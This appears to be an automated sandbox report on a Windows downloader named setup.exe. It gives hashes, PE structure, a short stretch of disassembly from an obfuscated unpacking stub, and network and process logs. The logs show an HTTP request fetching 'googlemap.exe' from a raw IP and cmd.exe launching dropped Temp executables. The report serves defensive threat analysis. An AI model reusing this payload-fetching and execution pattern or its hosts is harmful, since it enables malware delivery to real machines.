                            DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                            • 104.21.79.229
                            Orden de Compra.exeGet hashmaliciousGuLoaderBrowse
                            • 104.21.79.229
                            cheat.exeGet hashmaliciousUnknownBrowse
                            • 104.21.79.229
                            mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
                            • 104.21.79.229
                            Price Offer_1200R4 1200R20.exeGet hashmaliciousGuLoader, RedLineBrowse
                            • 104.21.79.229
                            file.htaGet hashmaliciousUnknownBrowse
                            • 104.21.79.229
                            rCompanyProfile.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 104.21.79.229
                            SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 104.21.79.229
                            No context
                            Process:C:\Users\user\Desktop\setup.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):305
                            Entropy (8bit):4.8875748675707955
                            Encrypted:false
                            SSDEEP:6:YWybucxaNmd4rpHXIpIIIk7+Bkz4fQbtVVgW+1C/kB5CLj6H/RGzqd7XNn:YWybucxaNmd4rpHMIi+BgBVVf+teOfFr
                            MD5:F803395CCB7D2AB64275B986EE0304CA
                            SHA1:EFAA033BC749421ECEA73031808AF68E845619F0
                            SHA-256:DC88C96FFFB9D323E60D642016683945C395AF675CDC8DF089A2949AECE9011A
                            SHA-512:BAC440BCD66239BB492C3B76B48A8D1CC8F04604830C8676736A15A71A5EE9580119AFC31305ACFB9F193726162133ACB01B90F812B3458E795D694314496C87
                            Malicious:false
                            Reputation:low
                            Preview:{"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}
                            Process:C:\Users\user\Desktop\setup.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):305
                            Entropy (8bit):4.8875748675707955
                            Encrypted:false
                            SSDEEP:6:YWybucxaNmd4rpHXIpIIIk7+Bkz4fQbtVVgW+1C/kB5CLj6H/RGzqd7XNn:YWybucxaNmd4rpHMIi+BgBVVf+teOfFr
                            MD5:F803395CCB7D2AB64275B986EE0304CA
                            SHA1:EFAA033BC749421ECEA73031808AF68E845619F0
                            SHA-256:DC88C96FFFB9D323E60D642016683945C395AF675CDC8DF089A2949AECE9011A
                            SHA-512:BAC440BCD66239BB492C3B76B48A8D1CC8F04604830C8676736A15A71A5EE9580119AFC31305ACFB9F193726162133ACB01B90F812B3458E795D694314496C87
                            Malicious:false
                            Reputation:low
                            Preview:{"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.272562266136198
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:setup.exe
                            File size:2'341'888 bytes
                            MD5:efe2c721d0d0d48abe27aeb0285d36b8
                            SHA1:f2e6c2b92d26fbf31c4cae9dbee1ff578ac86940
                            SHA256:155ad546339267dea91ea573275e5912450d803ca537c9d454f48d9b7fd2749a
                            SHA512:71ef9082b2c8f57f21353ed33d03db7801ea98acff34ad55a14b1a4009fae309d6af43d93281d7fd4341aa8d7c20eade55ffde9786aaeb357a559fdab3420f80
                            SSDEEP:49152:UgjT4hhRFURQh9Aj40DeGSwyfjblvrDAQ6:UgjT4hhRnhKjrFSh/hrs
                            TLSH:56B5AB2E1383C211F82E11345966E67573EDFC975D257B8D96C2FEBB3030E025AEA918
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@w..@w..@w..&t..@w..&r..@w..&s..@w.)*s..@w.)*t..@w.)*r..@w..&v..@w..@v..@w..+~..@w..+...@w..+u..@w.Rich.@w................
                            Icon Hash:0e27697065311323
                            Entrypoint:0x94f000
                            Entrypoint Section:gegnfrcd
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x5F81920A [Sat Oct 10 10:50:50 2020 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:baa93d47220682c04d92f7797d9224ce
                            Instruction
                            push esi
                            push eax
                            push ebx
                            call 00007F47CC8D6F46h
                            int3
                            pop eax
                            mov ebx, eax
                            inc eax
                            sub eax, 00212000h
                            sub eax, 100C1744h
                            add eax, 100C173Bh
                            cmp byte ptr [ebx], FFFFFFCCh
                            jne 00007F47CC8D6F5Bh
                            mov byte ptr [ebx], 00000000h
                            mov ebx, 00001000h
                            push 74C52558h
                            push 522B816Ah
                            push ebx
                            push eax
                            call 00007F47CC8D6F4Fh
                            add eax, 00000000h
                            mov dword ptr [esp+08h], eax
                            pop ebx
                            pop eax
                            ret
                            push ebp
                            mov ebp, esp
                            push eax
                            push ebx
                            push ecx
                            push esi
                            mov esi, dword ptr [ebp+08h]
                            mov ecx, dword ptr [ebp+0Ch]
                            shr ecx, 02h
                            mov eax, dword ptr [ebp+10h]
                            mov ebx, dword ptr [ebp+14h]
                            test ecx, ecx
                            je 00007F47CC8D6F4Ch
                            xor dword ptr [esi], eax
                            add dword ptr [esi], ebx
                            add esi, 04h
                            dec ecx
                            jmp 00007F47CC8D6F34h
                            pop esi
                            pop ecx
                            pop ebx
                            pop eax
                            leave
                            retn 0010h
                            xor dh, dh
                            imul esp, dword ptr [edi+1Ah], 45h
                            adc bh, byte ptr [edx]
                            xchg dword ptr [edi+edx-448D94A6h], ebp
                            jnl 00007F47CC8D6F42h
                            movsd
                            arpl word ptr [edi-77h], dx
                            sub al, 24h
                            mov ebp, 17A02185h
                            xor ebx, ebp
                            pop ebp
                            push ebx
                            sub dword ptr [esp], 577930EAh
                            mov edx, dword ptr [esp]
                            add esp, 04h
                            add edx, 577930EAh
                            sub ebx, esi
                            mov ecx, 3971163Ch
                            sub ecx, 37E4018Fh
                            and ecx, 0A843797h
                            sub ecx, 7C8E15ABh
                            shl ecx, 03h
                            dec ecx
                            xor ecx, 05C0D64Eh
                            xor ebx, ecx
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9406d0x95.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x6eb63.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x941f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x240000x2400073a2a23c322ac9c2211b2dbc920eebe6False0.6132609049479166data6.99772907263561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x250000x6eb630x4a00f7f0be8cb1f77244ad4562c59309cd9cFalse0.9724978885135135data7.89332696953071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x940000x10000x200fcd8670d94727052904b63820330082fFalse0.181640625data1.3087225765280863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x950000x2a80000x20033650362b9d1d11194134e25744b72a3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            pebpncdj0x33d0000x2120000x211c0020af796270b8c3925e2723c5b401b42cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            gegnfrcd0x54f0000x10000x200ce6aea9c5609e8f84f891484b1fa1945False0.482421875data3.7663669199452317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x4e02900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.299645390070922
                            RT_ICON0x4e06f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.16158536585365854
                            RT_ICON0x4e17a00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.08579357581483231
                            RT_ICON0x4e59c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.04283982018218384
                            RT_ICON0x4f61f00x14ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.24850299401197604
                            RT_ICON0x4f633e0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.02358937183773708
                            RT_ICON0x5383660x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.299645390070922
                            RT_ICON0x5387ce0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.16158536585365854
                            RT_ICON0x5398760x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.08579357581483231
                            RT_ICON0x53da9e0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.04283982018218384
                            RT_GROUP_ICON0x54e2c60x5adataEnglishUnited States0.7555555555555555
                            RT_GROUP_ICON0x54e3200x22dataEnglishUnited States1.088235294117647
                            RT_GROUP_ICON0x54e3420x22dataEnglishUnited States1.1176470588235294
                            RT_VERSION0x54e3640x360dataEnglishUnited States0.41898148148148145
                            RT_MANIFEST0x54e6c40x3e7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminatorsEnglishUnited States0.5145145145145145
                            DLLImport
                            kernel32.dlllstrcpy
                            comctl32.dllInitCommonControls
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 14, 2024 18:48:04.095606089 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.095643997 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:04.095719099 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.117841959 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.117897987 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:04.623415947 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:04.624037981 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.688221931 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.688266039 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:04.688711882 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:04.690903902 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.694047928 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:04.740503073 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:05.157999039 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:05.158111095 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:05.158124924 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:05.158173084 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:05.158268929 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:05.212671995 CEST49713443192.168.2.6104.21.79.229
                            Jul 14, 2024 18:48:05.212697029 CEST44349713104.21.79.229192.168.2.6
                            Jul 14, 2024 18:48:16.758513927 CEST4971980192.168.2.6208.95.112.1
                            Jul 14, 2024 18:48:16.763459921 CEST8049719208.95.112.1192.168.2.6
                            Jul 14, 2024 18:48:16.763554096 CEST4971980192.168.2.6208.95.112.1
                            Jul 14, 2024 18:48:16.764935017 CEST4971980192.168.2.6208.95.112.1
                            Jul 14, 2024 18:48:16.769826889 CEST8049719208.95.112.1192.168.2.6
                            Jul 14, 2024 18:48:17.253199100 CEST8049719208.95.112.1192.168.2.6
                            Jul 14, 2024 18:48:17.253385067 CEST4971980192.168.2.6208.95.112.1
                            Jul 14, 2024 18:48:17.283986092 CEST4972080192.168.2.645.12.4.151
                            Jul 14, 2024 18:48:17.288795948 CEST804972045.12.4.151192.168.2.6
                            Jul 14, 2024 18:48:17.292234898 CEST4972080192.168.2.645.12.4.151
                            Jul 14, 2024 18:48:17.292234898 CEST4972080192.168.2.645.12.4.151
                            Jul 14, 2024 18:48:17.297082901 CEST804972045.12.4.151192.168.2.6
                            Jul 14, 2024 18:48:19.031194925 CEST804972045.12.4.151192.168.2.6
                            Jul 14, 2024 18:48:19.031354904 CEST4972080192.168.2.645.12.4.151
                            Jul 14, 2024 18:48:19.034729004 CEST4972080192.168.2.645.12.4.151
                            Jul 14, 2024 18:48:19.039886951 CEST804972045.12.4.151192.168.2.6
                            Jul 14, 2024 18:48:24.273936987 CEST4971980192.168.2.6208.95.112.1
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 14, 2024 18:48:04.071732998 CEST6328453192.168.2.61.1.1.1
                            Jul 14, 2024 18:48:04.081602097 CEST53632841.1.1.1192.168.2.6
                            Jul 14, 2024 18:48:05.218271971 CEST5018053192.168.2.61.1.1.1
                            Jul 14, 2024 18:48:05.230529070 CEST53501801.1.1.1192.168.2.6
                            Jul 14, 2024 18:48:16.348800898 CEST6203353192.168.2.61.1.1.1
                            Jul 14, 2024 18:48:16.683933973 CEST53620331.1.1.1192.168.2.6
                            Jul 14, 2024 18:48:16.750257015 CEST5665953192.168.2.61.1.1.1
                            Jul 14, 2024 18:48:16.757658005 CEST53566591.1.1.1192.168.2.6
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 14, 2024 18:48:04.071732998 CEST192.168.2.61.1.1.10xc152Standard query (0)2no.coA (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:05.218271971 CEST192.168.2.61.1.1.10x13e4Standard query (0)suomenen.comA (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:16.348800898 CEST192.168.2.61.1.1.10x480Standard query (0)nffiiload08.topA (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:16.750257015 CEST192.168.2.61.1.1.10xab1eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 14, 2024 18:48:04.081602097 CEST1.1.1.1192.168.2.60xc152No error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:04.081602097 CEST1.1.1.1192.168.2.60xc152No error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:05.230529070 CEST1.1.1.1192.168.2.60x13e4Name error (3)suomenen.comnonenoneA (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:16.683933973 CEST1.1.1.1192.168.2.60x480Name error (3)nffiiload08.topnonenoneA (IP address)IN (0x0001)false
                            Jul 14, 2024 18:48:16.757658005 CEST1.1.1.1192.168.2.60xab1eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                            • 2no.co
                            • ip-api.com
                            • 45.12.4.151
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649719208.95.112.1804328C:\Users\user\Desktop\setup.exe
                            TimestampBytes transferredDirectionData
                            Jul 14, 2024 18:48:16.764935017 CEST273OUTGET /json HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ip-api.com
                            Connection: Keep-Alive
                            Jul 14, 2024 18:48:17.253199100 CEST482INHTTP/1.1 200 OK
                            Date: Sun, 14 Jul 2024 16:48:16 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 305
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.64972045.12.4.151804328C:\Users\user\Desktop\setup.exe
                            TimestampBytes transferredDirectionData
                            Jul 14, 2024 18:48:17.292234898 CEST283OUTGET /googlemap.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: 45.12.4.151
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649713104.21.79.2294434328C:\Users\user\Desktop\setup.exe
                            TimestampBytes transferredDirectionData
                            2024-07-14 16:48:04 UTC271OUTGET /2URUU5 HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: 2no.co
                            Connection: Keep-Alive
                            2024-07-14 16:48:05 UTC1192INHTTP/1.1 302 Found
                            Date: Sun, 14 Jul 2024 16:48:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            location: http://suomenen.com/helka/trll.php
                            set-cookie: 20823918137263905=1; expires=Mon, 14 Jul 2025 16:48:05 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                            set-cookie: clhf03028ja=8.46.123.33; expires=Mon, 14 Jul 2025 16:48:05 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                            memory: 0.41253662109375
                            expires: Sun, 14 Jul 2024 16:48:05 +0000
                            Cache-Control: no-store, no-cache, must-revalidate
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvU9Y%2FNyYx%2Be6Fwz97HY0uwxleU8QCtRUIgebqOpORAD7vgmIHDZD9bBEJ9rG9Wk480qe0fzNEwcWOzvtt%2FHgf3OVnRmzl6Qh4GgECQNbNmadcxmJ6yzkNM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a32ff8da8d672b1-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-14 16:48:05 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:12:47:44
                            Start date:14/07/2024
                            Path:C:\Users\user\Desktop\setup.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\setup.exe"
                            Imagebase:0x250000
                            File size:2'341'888 bytes
                            MD5 hash:EFE2C721D0D0D48ABE27AEB0285D36B8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:5
                            Start time:12:48:04
                            Start date:14/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:12:48:04
                            Start date:14/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:12:48:15
                            Start date:14/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:12:48:15
                            Start date:14/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:12:48:15
                            Start date:14/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:12:48:15
                            Start date:14/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:12:48:18
                            Start date:14/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:12:48:18
                            Start date:14/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            No disassembly